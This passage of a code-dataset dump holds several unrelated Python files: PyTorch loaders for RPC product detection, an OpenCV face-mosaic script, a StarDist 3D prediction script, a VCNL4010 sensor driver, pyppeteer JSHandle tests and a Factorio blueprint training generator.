RPCTestDataset(torch.utils.data.Dataset):\n def __init__(self, images_dir, ann_file, transforms=None):\n self.transforms = transforms\n self.images_dir = images_dir\n self.ann_file = ann_file\n\n with open(self.ann_file) as fid:\n data = json.load(fid)\n\n annotations = defaultdict(list)\n images = []\n for image in data['images']:\n images.append(image)\n for ann in data['annotations']:\n bbox = ann['bbox']\n x, y, w, h = bbox[0], bbox[1], bbox[2], bbox[3]\n 
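# Note on the box format here: the annotation bboxes are COCO-style
# [x, y, w, h], while BoxList in __getitem__ below is built in xyxy mode,
# hence the [x, y, x + w, y + h] conversion. For one illustrative box:
#   x, y, w, h = 10.0, 20.0, 30.0, 40.0
#   xyxy = [x, y, x + w, y + h]   # -> [10.0, 20.0, 40.0, 60.0]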
annotations[ann['image_id']].append((ann['category_id'], x, y, w, h))\n\n self.images = images\n self.annotations = dict(annotations)\n\n def __getitem__(self, index):\n image_id = self.images[index]['id']\n img_path = os.path.join(self.images_dir, self.images[index]['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n ann = self.annotations[image_id]\n for category, x, y, w, h in ann:\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def get_annotation(self, image_id):\n ann = self.annotations[image_id]\n return ann\n\n def __len__(self):\n return len(self.images)\n\n def get_img_info(self, index):\n image = self.images[index]\n return {\"height\": image['height'], \"width\": image['width'], \"id\": image['id'], 'file_name': image['file_name']}\n\n\n# --------------------------------------------\n# ----------------Train dataset---------------\n# --------------------------------------------\nclass RPCDataset(torch.utils.data.Dataset):\n def __init__(self,\n images_dir,\n ann_file,\n use_density_map=False,\n rendered=False,\n transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.use_density_map = use_density_map\n self.rendered = rendered\n self.transforms = transforms\n self.density_categories = 1\n self.density_map_stride = 1.0 / 8\n self.density_min_sigma = 1.0\n\n self.scale = 1.0\n self.ext = '.jpg'\n self.image_size = 1815\n\n if self.rendered: # Rendered image is 800*800 and format is png\n self.scale = 800.0 / 1815.0\n self.ext = '.png'\n self.image_size = 800\n\n with open(self.ann_file) as fid:\n self.annotations = json.load(fid)\n\n def __getitem__(self, index):\n ann = self.annotations[index]\n image_id = ann['image_id']\n image_name = os.path.splitext(image_id)[0]\n img_path = os.path.join(self.images_dir, image_name + self.ext)\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n objects = ann['objects']\n for item in objects:\n category = item['category_id']\n x, y, w, h = item['bbox']\n boxes.append([x * self.scale, y * self.scale, (x + w) * self.scale, (y + h) * self.scale])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n\n if self.use_density_map:\n image_size = self.image_size\n size = int(self.density_map_stride * 800)\n num_classes = self.density_categories\n assert img.width == image_size\n assert img.height == image_size\n super_categories = [rpc_category_to_super_category(category, num_classes) for category in labels]\n density_map = generate_density_map(super_categories, boxes,\n scale=size / image_size,\n size=size, num_classes=num_classes,\n min_sigma=self.density_min_sigma)\n target.add_field('heatmap', Heatmap(torch.from_numpy(density_map)))\n\n target = target.clip_to_image(remove_empty=True)\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.annotations)\n\n def get_img_info(self, index):\n image_size = 800 if self.rendered else 1815\n return 
{\"height\": image_size, \"width\": image_size}\n\n\nclass RPCPseudoDataset(torch.utils.data.Dataset):\n\n def __init__(self, images_dir, ann_file=None, use_density_map=False, annotations=None, transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.use_density_map = use_density_map\n self.transforms = transforms\n self.density_categories = 1\n self.density_map_stride = 1.0 / 8\n self.density_min_sigma = 1.0\n\n if annotations is not None:\n self.annotations = annotations\n else:\n with open(self.ann_file) as fid:\n annotations = json.load(fid)\n self.annotations = annotations\n\n print('Valid annotations: {}'.format(len(self.annotations)))\n\n def __getitem__(self, index):\n ann = self.annotations[index]\n img_path = os.path.join(self.images_dir, ann['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n for category, x, y, w, h in ann['bbox']:\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n if self.use_density_map:\n size = int(800 * self.density_map_stride)\n image_size = img.width # Test images are squares, except 20180824-14-36-38-430.jpg(1860x1859)\n num_classes = self.density_categories\n super_categories = [rpc_category_to_super_category(category, self.density_categories) for category in labels]\n density_map = generate_density_map(super_categories, boxes,\n scale=size / image_size,\n size=size,\n num_classes=num_classes,\n min_sigma=self.density_min_sigma)\n target.add_field('heatmap', Heatmap(torch.from_numpy(density_map)))\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.annotations)\n\n def get_img_info(self, index):\n ann = self.annotations[index]\n return {\"height\": ann['height'], \"width\": ann['width'], \"id\": ann['id'], 'file_name': ann['file_name']}\n\n\nclass RPCInstanceSelectDataset(torch.utils.data.Dataset):\n\n def __init__(self, images_dir, ann_file, transforms=None):\n self.images_dir = images_dir\n self.ann_file = ann_file\n self.transforms = transforms\n self.images_dir = images_dir\n self.threshold = 0.95\n\n with open(self.ann_file) as fid:\n annotations = json.load(fid)\n\n delete_keys = []\n total_objects = 0\n filtered_objects = 0\n annotation_dict = defaultdict(list)\n for annotation in annotations:\n annotation_dict[annotation['image_id']].append(annotation)\n for image_id in annotation_dict:\n count = 0\n for obj in annotation_dict[image_id]:\n total_objects += 1\n if obj['score'] > self.threshold:\n filtered_objects += 1\n count += 1\n if count == 0:\n delete_keys.append(image_id)\n\n with open('/data7/lufficc/rpc/instances_test2019.json') as fid:\n data = json.load(fid)\n\n images = []\n for image in data['images']:\n if image['id'] not in delete_keys:\n images.append(image)\n\n for image_id in delete_keys:\n del annotation_dict[image_id]\n\n self.annotations = dict(annotation_dict)\n self.images = images\n assert len(self.images) == len(self.annotations)\n\n print('Valid annotations: {}'.format(len(self.annotations)))\n print('Ratio: {:.3f}({}/{})'.format(filtered_objects / total_objects, filtered_objects, total_objects))\n\n def __getitem__(self, index):\n ann = self.annotations[self.images[index]['id']]\n img_path = 
os.path.join(self.images_dir, self.images[index]['file_name'])\n img = Image.open(img_path).convert(\"RGB\")\n width, height = img.size[0], img.size[1]\n boxes = []\n labels = []\n viz = False\n for obj in ann:\n if obj['score'] > self.threshold:\n category = obj['category_id']\n x, y, w, h = obj['bbox']\n boxes.append([x, y, x + w, y + h])\n labels.append(category)\n else:\n x, y, w, h = [round(k) for k in obj['bbox']]\n img = np.array(img)\n img[y:y + h, x:x + w, :] = (164, 166, 164)\n img = Image.fromarray(img, mode='RGB')\n if viz:\n import matplotlib.pyplot as plt\n plt.imshow(img)\n plt.show()\n quit()\n\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n target.add_field('labels', torch.tensor(labels))\n target = target.clip_to_image(remove_empty=True)\n\n if self.transforms is not None:\n img, target = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.images)\n\n def get_img_info(self, index):\n ann = self.images[index]\n return ann\n\n\nclass ImagesDataset(torch.utils.data.Dataset):\n def __init__(self, transforms=None):\n self.folder = '/data7/lufficc/rpc/train2019/'\n self.paths = glob.glob(os.path.join(self.folder, '*.jpg'))\n random.shuffle(self.paths)\n self.transforms = transforms\n\n def __getitem__(self, index):\n path = self.paths[index]\n img = Image.open(path).convert('RGB')\n width, height = img.size[0], img.size[1]\n boxes = np.zeros([0, 4], dtype=np.float32)\n target = BoxList(torch.tensor(boxes, dtype=torch.float32), (width, height), mode=\"xyxy\")\n if self.transforms:\n img, _ = self.transforms(img, target)\n\n return img, target, index\n\n def __len__(self):\n return len(self.paths)\n","sub_path":"dpsnet/maskrcnn_benchmark/data/datasets/rpc_back.py","file_name":"rpc_back.py","file_ext":"py","file_size_in_byte":11768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"322667857","text":"# 이미지 모자이크\r\nimport cv2\r\n\r\ncascade_file = \"haarcascade_frontalface_default.xml\"\r\ncascade = cv2.CascadeClassifier(cascade_file)\r\n\r\n# image_file = './data/face1.jpg'\r\nimage_file = './data/face2.jpg'\r\n\r\nimage = cv2.imread(image_file)\r\nimage_gs = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\r\nface_list = cascade.detectMultiScale(image_gs, scaleFactor=1.1,\r\n minNeighbors=1, minSize=(100, 100))\r\n\r\nif len(face_list) == 0:\r\n print(\"No face\")\r\n quit()\r\n\r\nmosaic_rate = 20\r\n\r\nprint(face_list)\r\ncolor = (0, 0, 255)\r\n\r\nfor (x, y, w, h) in face_list:\r\n face_img = image[y:y+h, x:x+w]\r\n face_img = cv2.resize(face_img, (w//mosaic_rate, h//mosaic_rate))\r\n face_img = cv2.resize(face_img, (w, h), \r\n interpolation=cv2.INTER_AREA) # 같은 색으로 채우기\r\n image[y:y+h, x:x+w] = face_img\r\n\r\ncv2.imshow(\"image\", image)\r\ncv2.waitKey()\r\ncv2.destroyAllWindows()\r\n","sub_path":"03. 
OpenCV-example/face/ex02.py","file_name":"ex02.py","file_ext":"py","file_size_in_byte":922,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"12164216","text":"\"\"\"\n\nCommand line script to perform prediction in 3D\n\n\"\"\"\n\n\nimport os\nimport sys\nimport numpy as np\nfrom tqdm import tqdm\nimport json \nimport argparse\nimport pprint \nimport pathlib\nimport warnings\n\ndef main():\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter, description=\"\"\"\nPrediction script for a 3D stardist model, usage: stardist-predict -i input.tif -m model_folder_or_pretrained_name -o output_folder\n\n\"\"\")\n parser.add_argument(\"-i\",\"--input\", type=str, nargs=\"+\", required=True, help = \"input file (tiff)\")\n parser.add_argument(\"-o\",\"--outdir\", type=str, default='.', help = \"output directory\")\n parser.add_argument(\"--outname\", type=str, nargs=\"+\", default='{img}.stardist.tif', help = \"output file name (tiff)\")\n\n group = parser.add_mutually_exclusive_group(required=True)\n group.add_argument('-m', '--model', type=str, default=None, help = \"model folder / pretrained model to use\")\n parser.add_argument(\"--axes\", type=str, default = None, help = \"axes to use for the input, e.g. 'XYC'\")\n parser.add_argument(\"--n_tiles\", type=int, nargs=3, default = None, help = \"number of tiles to use for prediction\")\n parser.add_argument(\"--pnorm\", type=float, nargs=2, default = [1,99.8], help = \"pmin/pmax to use for normalization\")\n parser.add_argument(\"--prob_thresh\", type=float, default=None, help = \"prob_thresh for model (if not given use model default)\")\n parser.add_argument(\"--nms_thresh\", type=float, default=None, help = \"nms_thresh for model (if not given use model default)\")\n \n parser.add_argument(\"-v\", \"--verbose\", action='store_true')\n \n args = parser.parse_args()\n\n\n from csbdeep.utils import normalize\n from csbdeep.models.base_model import get_registered_models\n from stardist.models import StarDist3D\n from tifffile import imwrite, imread\n\n get_registered_models(StarDist3D, verbose=True)\n\n if pathlib.Path(args.model).is_dir():\n model = StarDist3D(None, name=args.model)\n else:\n model = StarDist3D.from_pretrained(args.model)\n\n if model is None:\n raise ValueError(f\"unknown model: {args.model}\\navailable models:\\n {get_registered_models(StarDist2D, verbose=True)}\")\n \n for fname in args.input:\n if args.verbose:\n print(f'reading image {fname}')\n\n if not pathlib.Path(fname).suffix.lower() in (\".tif\", \".tiff\"):\n raise ValueError('only tiff files supported in 3D for now')\n\n img = imread(fname)\n\n\n if not img.ndim in (3,4):\n raise ValueError(f'currently only 3d (or 4D with channel) images are supported by the prediction script')\n\n if args.axes is None:\n args.axes = {3:'ZYX',4:'ZYXC'}[img.ndim]\n \n if len(args.axes) != img.ndim:\n raise ValueError(f'dimension of input ({img.ndim}) not the same as length of given axes ({len(args.axes)})')\n\n if args.verbose:\n print(f'loaded image of size {img.shape}')\n\n if args.verbose:\n print(f'normalizing...')\n \n img = normalize(img,*args.pnorm)\n\n labels, _ = model.predict_instances(img,\n n_tiles=args.n_tiles,\n prob_thresh=args.prob_thresh,\n nms_thresh=args.nms_thresh)\n out = pathlib.Path(args.outdir)\n out.mkdir(parents=True,exist_ok=True)\n\n imwrite(out/args.outname.format(img=pathlib.Path(fname).with_suffix('').name), labels)\n \n\nif __name__ == '__main__':\n 
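# A typical command line for this script might be (model name, tiling and
# output folder are illustrative placeholders, not values required by the
# script; all flags shown are defined in the argparse setup above):
#   python predict3d.py -i volume.tif -m my_stardist3d_model \
#       --n_tiles 1 2 2 --pnorm 1 99.8 -o predictions -v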
main()\n","sub_path":"stardist/scripts/predict3d.py","file_name":"predict3d.py","file_ext":"py","file_size_in_byte":3561,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"28874005","text":"\"\"\"\nVCNL4010 PROXIMITY SENSOR LIBRARY\n\nWORKING VERSION\n\nDESCRIPTION\n Current working version of proximity sensor code with custom read and write methods\n\nISSUES\n Output range is 2000 - 15000 instead of 0 - 65000\n Read method\n Original read method uses buffer to \"write then read into\" instead of just read from the register\n 16 bit conversion\n Not sure if the method I'm using is actually reading into 16 bit high and low bytes\n\nQUESTIONS\n Do I have to use a buffer?\n Why is the original method writing and then reading from the buffer immediately?\n How can I better replicate the original library with my code?\n Is the read and write from the SMBus library comparable to the read and write from the CircuitPython library?\n Also questions around conversion from high and low byte to 16 bit data?\n Seems like all the outputs I'm getting are in decimal values?\n Is it worth reading from one register (8 bit) then the other, combining into a string then reading then entire\n value as a 16 bit byte?\n\nAPPROACHES - what have I tried that hasn't worked\n Using CircuitPython based libraries\n Need to have a board that is custom built for their application\n\n Recreating the \"write_read\" method within the source code with my methods from SMBus\n Unclear how they write into the buffer, where the buffer is located, how they read from the buffer\n Note that my current version does not use a buffer\n\n\n\"\"\"\n\nfrom micropython import const\nimport adafruit_bus_device.i2c_device as i2c_device\nfrom smbus2 import SMBus\n\n__version__ = \"0.0.0-auto.0\"\n\n# pylint: disable=bad-whitespace\n# Internal constants:\n_VCNL4010_I2CADDR_DEFAULT = const(0x13)\n_VCNL4010_COMMAND = const(0x80)\n_VCNL4010_PRODUCTID = const(0x81)\n_VCNL4010_PROXRATE = const(0x82)\n_VCNL4010_IRLED = const(0x83)\n_VCNL4010_AMBIENTPARAMETER = const(0x84)\n_VCNL4010_AMBIENTDATA = const(0x85)\n_VCNL4010_PROXIMITYDATA = const(0x87)\n_VCNL4010_INTCONTROL = const(0x89)\n_VCNL4010_PROXINITYADJUST = const(0x8A)\n_VCNL4010_INTSTAT = const(0x8E)\n_VCNL4010_MODTIMING = const(0x8F)\n_VCNL4010_MEASUREAMBIENT = const(0x10)\n_VCNL4010_MEASUREPROXIMITY = const(0x08)\n_VCNL4010_AMBIENTREADY = const(0x40)\n_VCNL4010_PROXIMITYREADY = const(0x20)\n_VCNL4010_AMBIENT_LUX_SCALE = 0.25 # Lux value per 16-bit result value.\n\n# User-facing constants:\nFREQUENCY_3M125 = 3\nFREQUENCY_1M5625 = 2\nFREQUENCY_781K25 = 1\nFREQUENCY_390K625 = 0\n\n# Disable pylint's name warning as it causes too much noise. Suffixes like\n# BE (big-endian) or mA (milli-amps) don't confirm to its conventions--by\n# design (clarity of code and explicit units). 
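# On the 16-bit conversion question raised in the header above: reading two
# bytes over SMBus and combining them big-endian is (high << 8) | low, which
# is what _read_u16BE below does with read_i2c_block_data. A quick worked
# example (values are illustrative):
#   high, low = 0x12, 0x34
#   value = (high << 8) | low   # -> 0x1234 == 4660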
Disable this globally to prevent\n# littering the code with pylint disable and enable and making it less readable.\n# pylint: disable=invalid-name\n\nclass VCNL4010:\n \"\"\"Vishay VCNL4010 proximity and ambient light sensor.\"\"\"\n\n def __init__(self):\n self._device = SMBus(1)\n self.led_current = 20\n self.frequency = FREQUENCY_390K625\n self._write_u8(_VCNL4010_INTCONTROL, 0x08)\n\n def _read_u8(self, address):\n # Read an 8-bit unsigned value from the specified 8-bit address.\n with SMBus(1) as self._device:\n read = self._device.read_byte_data(_VCNL4010_I2CADDR_DEFAULT, address)\n return read\n\n def _write_u8(self, address, val):\n # Write an 8-bit unsigned value to the specified 8-bit address.\n with SMBus(1) as self._device:\n self._device.write_byte_data(_VCNL4010_I2CADDR_DEFAULT, address, val)\n\n def _read_u16BE(self, address):\n with SMBus(1) as self._device:\n read_block = self._device.read_i2c_block_data(_VCNL4010_I2CADDR_DEFAULT, address, 2)\n return (read_block[0] << 8) | read_block[1]\n\n @property\n def proximity(self):\n \"\"\"The detected proximity of an object in front of the sensor. This\n is a unit-less unsigned 16-bit value (0-65535) INVERSELY proportional\n to the distance of an object in front of the sensor (up to a max of\n ~200mm). For example a value of 10 is an object farther away than a\n value of 1000. Note there is no conversion from this value to absolute\n distance possible, you can only make relative comparisons.\n \"\"\"\n # Clear interrupt.\n status = self._read_u8(_VCNL4010_INTSTAT)\n status &= ~0x80\n self._write_u8(_VCNL4010_INTSTAT, status)\n # Grab a proximity measurement.\n self._write_u8(_VCNL4010_COMMAND, _VCNL4010_MEASUREPROXIMITY)\n # Wait for result, then read and return the 16-bit value.\n while True:\n result = self._read_u8(_VCNL4010_COMMAND)\n if result & _VCNL4010_PROXIMITYREADY:\n return self._read_u16BE(_VCNL4010_PROXIMITYDATA)\n","sub_path":"Archive/Proximity_Sensor.py","file_name":"Proximity_Sensor.py","file_ext":"py","file_size_in_byte":4874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"548238995","text":"from Mapping.StockMarketFeaturesMapping import StockMarketFeaturesMapping\nimport time\nfrom multiprocessing import Pool\n\nCON = [\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': 'STOCK_DESCRIPTION',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'area',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_AREA_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': 'STOCK_INDUSTRY',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'industry',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_INDUSTRY_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': '',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'market',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_MARKET_RISE_RATIO',\n 'chunkSize': 10\n },\n {\n 'sourceStockTechIndiTableName': 'DERI_STOCK_TECH_INDICATORS',\n 'sourceCategoryTableName': '',\n 'codeField': 'code',\n 'dateField': 'date',\n 'categoryField': 'all',\n 'retSeriesField': ['RET'],\n 'lags': [1, 2, 5, 10, 20, 30, 60],\n 'targetTableName': 'DERI_ALL_STOCK_RISE_RATIO',\n 
'chunkSize': 10\n }\n]\n\ndef airflowCallableArea():\n con = CON[0]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableIndustry():\n con = CON[1]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableMarket():\n con = CON[2]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\ndef airflowCallableAllStock():\n con = CON[3]\n features = StockMarketFeaturesMapping(**con)\n features.run()\n\n\nif __name__ == '__main__':\n start_time = time.clock()\n # airflowCallableAllStock()\n # pool = Pool(processes=4)\n # tot_res = []\n for i in CON:\n features = StockMarketFeaturesMapping(**i)\n features.run()\n # res = pool.apply_async(features.run)\n # tot_res.append(res)\n\n # for (i, res) in enumerate(tot_res):\n # res.get()\n\n eclapsed = time.clock() - start_time\n print(\"Time eclapsed\", eclapsed)","sub_path":"Derivatives/calStockMarketFeatures.py","file_name":"calStockMarketFeatures.py","file_ext":"py","file_size_in_byte":2553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"617236661","text":"import pytest\nfrom syncer import sync\n\nfrom pyppeteer.errors import NetworkError\nfrom tests.conftest import CHROME\n\n\n@sync\nasync def test_handle(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n assert await p.evaluateHandle('window')\n\n\n@sync\nasync def test_handle_with_arg(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n navigatorHandle = await p.evaluateHandle(\"navigator\")\n text = await p.evaluate('e => e.userAgent', navigatorHandle)\n assert 'Mozilla' in text\n\n\n@sync\nasync def test_handle_primitive_types(isolated_page, server):\n \"\"\"test getting handle\"\"\"\n p = isolated_page\n handle = await p.evaluateHandle('5')\n assert p.evaluate('e => Object.is(e, 5)', handle)\n\n\n@sync\nasync def test_warn_nested_handles(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('document.body')\n await p.evaluateHandle(\n \"opts => opts.elem.querySelector('p')\",\n handle, # todo translate {elem: handle} right now this hangs\n )\n\n\n@sync\nasync def test_handle_unserializable(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('Infinity')\n assert await p.evaluate('e => Object.is(e, Infinity)', handle) is True\n\n\n@sync\nasync def test_js_wrappers(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => {\n window.Foo = 123;\n return window; \n }\n \"\"\".strip())\n assert await p.evaluate('e => e.Foo', handle) == 123\n\n\n@sync\nasync def test_with_primitives(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => {\n window.Foo = 123;\n return window; \n }\n \"\"\".strip())\n assert await p.evaluate('e => e.Foo', handle) == 123\n\n\n@sync\nasync def test_getProperty(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle(\"\"\"\n () => ({\n one: 1,\n two: 2,\n three: 3\n })\n \"\"\".strip())\n handle2 = await handle.getProperty('two')\n assert await handle2.jsonValue() == 2\n\n\n@sync\nasync def test_jsonValue(isolated_page, server):\n # should work with json values\n p = isolated_page\n handle = await p.evaluateHandle('() => ({foo: \"bar\"})')\n assert await handle.jsonValue() == {'foo': 'bar'}\n\n # should not work with dates\n handle_date = await p.evaluateHandle(\n \"new Date('2017-09-26T00:00:00.000Z')\"\n )\n assert await handle_date.jsonValue() == 
{}\n\n # should throw for circular objects like windows\n handle_window = await p.evaluateHandle('window')\n with pytest.raises(NetworkError) as e:\n await handle_window.jsonValue()\n if CHROME:\n assert e.match('Object reference chain is too long')\n else:\n assert e.match('Object is not serial')\n\n\n@sync\nasync def test_getProperties(isolated_page, server):\n p = isolated_page\n handle = await p.evaluateHandle('({foo: \"bar\"})')\n properties = await handle.getProperties()\n foo = properties.get('foo')\n assert foo\n assert await foo.jsonValue() == 'bar'\n\n # should return even non-own properties\n handle = await p.evaluateHandle(\n \"\"\"\n () => {\n class A {\n constructor() {\n this.a = '1';\n }\n }\n\n class B extends A {\n constructor() {\n super();\n this.b = '2';\n }\n }\n\n return new B()\n }\n \"\"\")\n properties = await handle.getProperties()\n assert await properties.get('a').jsonValue() == '1'\n assert await properties.get('b').jsonValue() == '2'\n\n\n@sync\nasync def test_asElement(isolated_page, server):\n p = isolated_page\n # should work\n handle = await p.evaluateHandle(\"document.body\")\n assert handle.asElement()\n\n # should return None for non-elements\n handle = await p.evaluateHandle(\"2\")\n element = handle.asElement()\n assert element is None\n\n # should return ElementHandle for TextNodes\n await p.setContent('<div>ee!</div>')\n handle = await p.evaluateHandle(\n \"document.querySelector('div').firstChild\"\n )\n element = handle.asElement()\n assert element\n assert await p.evaluate(\n 'e => e.nodeType === HTMLElement.TEXT_NODE',\n element\n )\n\n\n # should work with nulified None\n await p.setContent('<section>test</section>')\n await p.evaluate('delete Node')\n handle = await p.evaluateHandle(\n 'document.querySelector(\"section\")'\n )\n assert handle.asElement()\n\n\n@sync\nasync def test_toString(isolated_page, server):\n p = isolated_page\n input_to_expected = {\n # should work for primitives\n '2': 'JSHandle:2',\n '\"a\"': 'JSHandle:a',\n # should work for complicated objects\n 'window': 'JSHandle@object',\n # should work with different subtypes\n '(function(){})': 'JSHandle@function',\n '12': 'JSHandle:12',\n 'true': 'JSHandle:True',\n 'undefined': 'JSHandle:None',\n '\"foo\"': 'JSHandle:foo',\n 'Symbol()': 'JSHandle@symbol',\n 'new Set()': 'JSHandle@set',\n 'new Map()': 'JSHandle@map',\n '[]': 'JSHandle@array',\n 'null': 'JSHandle:None',\n '/foo/': 'JSHandle@regexp',\n 'document.body': 'JSHandle@node',\n 'new Date()': 'JSHandle@date',\n 'new WeakMap()': 'JSHandle@weakmap',\n 'new Error()': 'JSHandle@error',\n 'new Int32Array()': 'JSHandle@typedarray',\n 'new Proxy({}, {})': 'JSHandle@proxy',\n\n }\n for value, expected in input_to_expected.items():\n handle = await p.evaluateHandle(value)\n assert handle.toString() == expected\n","sub_path":"tests/test_jshandle.py","file_name":"test_jshandle.py","file_ext":"py","file_size_in_byte":5782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"58102281","text":"import copy\nimport random\nfrom typing import Tuple, Generator, Dict\nimport numpy as np\n\nfrom Blueprint.Blueprint import Blueprint\nfrom Blueprint.BlueprintWrapper import BlueprintWrapper\nfrom Blueprint.Entity import Entity\nfrom Blueprint.Exceptions.UnknownEntityException import UnknownEntityException\nfrom Grid import Grid\nfrom data import iter_stored_blueprints\n\n\n# TODO remove\nnp.set_printoptions(edgeitems=1000, linewidth=1000)\n\n\nclass TrainGenerator:\n def __init__(self, 
minimum_entity_count: int = 3, train_omission_portion: float = 0.1, seed: int = None, verbose: bool = False):\n self.chunk_size: int = 32\n self.step_size: int = 16\n self.minimum_entity_count: int = minimum_entity_count\n\n if not 0 < train_omission_portion < 1.:\n raise Exception("train_omission_portion should be between 0 and 1")\n self.train_omission_portion: float = train_omission_portion\n self.seed: int = seed\n random.seed(self.seed) # seed the module-level RNG\n self.verbose: bool = verbose\n\n self.entity_index_map, self.reverse_entity_index_map = self._get_entity_index_dicts()\n self._e_lookup = np.vectorize(TrainGenerator._lookup_entity_index, otypes=[int, bool])\n self._re_lookup = np.vectorize(TrainGenerator._reverse_lookup_entity_index, otypes=[str])\n\n\n def _validate_entity_array(self, entity_array: np.array) -> bool:\n # TODO check number of entities?\n return True\n\n @staticmethod\n def _get_entity_index_dicts() -> Tuple[dict, dict]:\n entity_index_map = {}\n reverse_index_map = {}\n\n index = 0\n for k in Entity.get_entity_size_dict().keys():\n if not str(k).endswith("remnants"):\n entity_index_map[str(k)] = index\n reverse_index_map[index] = str(k)\n index += 1\n\n return entity_index_map, reverse_index_map\n\n @staticmethod\n def _lookup_entity_index(e: Entity, entity_index_map: Dict[str, int]):\n if e is None or e.name not in entity_index_map:\n return -1, False\n return entity_index_map[e.name], True\n\n @staticmethod\n def _reverse_lookup_entity_index(index: int, reverse_entity_index_map: Dict[int, str]):\n if index not in reverse_entity_index_map:\n return None\n return reverse_entity_index_map[index]\n\n def one_hot_encode_grid(self, entity_array: np.array) -> np.array:\n (h, w) = entity_array.shape\n one_hot_grid = np.zeros((h, w, len(self.entity_index_map)), dtype=int)\n\n for i in range(h):\n for j in range(w):\n entity: Entity = entity_array[i][j]\n if entity is None:\n continue\n\n one_hot_grid[i][j][self.entity_index_map[entity.name]] = 1\n return one_hot_grid\n\n def one_hot_decode_grid(self, one_hot_grid: np.array) -> np.array:\n # if all zero set the value of the cell to -1 else set to the argmax (index of max value)\n amax = np.where(np.count_nonzero(one_hot_grid, axis=-1) == 0,\n -1,\n np.argmax(one_hot_grid, axis=-1))\n return self._re_lookup(amax, self.reverse_entity_index_map)\n\n @staticmethod\n def _tile_numpy(grid_array: np.array, size: Tuple[int, int], border: int = 1) -> np.array:\n a = np.zeros((grid_array.shape[0] + border,\n grid_array.shape[1] + border,\n grid_array.shape[2]))\n a[: grid_array.shape[0], :grid_array.shape[1], :grid_array.shape[2]] = grid_array\n\n xn = int(np.ceil(size[1] / a.shape[1]))\n yn = int(np.ceil(size[0] / a.shape[0]))\n\n a = np.tile(a, [yn, xn, 1])\n return a[:size[0], :size[1]]\n\n def iter_grid_chunks(self, img: np.array) -> Generator[np.array, None, None]:\n if self.chunk_size % self.step_size != 0 or self.step_size > self.chunk_size:\n # Ensure size is a multiple of the step size\n raise Exception("Chunk size should be a larger multiple of step size in both dimensions")\n\n size = (int(np.ceil(img.shape[0] / self.step_size)) * self.step_size,\n int(np.ceil(img.shape[1] / self.step_size)) * self.step_size)\n\n tiled_img = self._tile_numpy(img, size)\n\n xs = np.arange(0, tiled_img.shape[1] - self.step_size, self.step_size)\n ys = np.arange(0, tiled_img.shape[0] - self.step_size, self.step_size)\n for x in xs:\n for y in ys:\n yield tiled_img[y: y + self.chunk_size, x: x + self.chunk_size]\n\n def iter_individual_blueprints(self) 
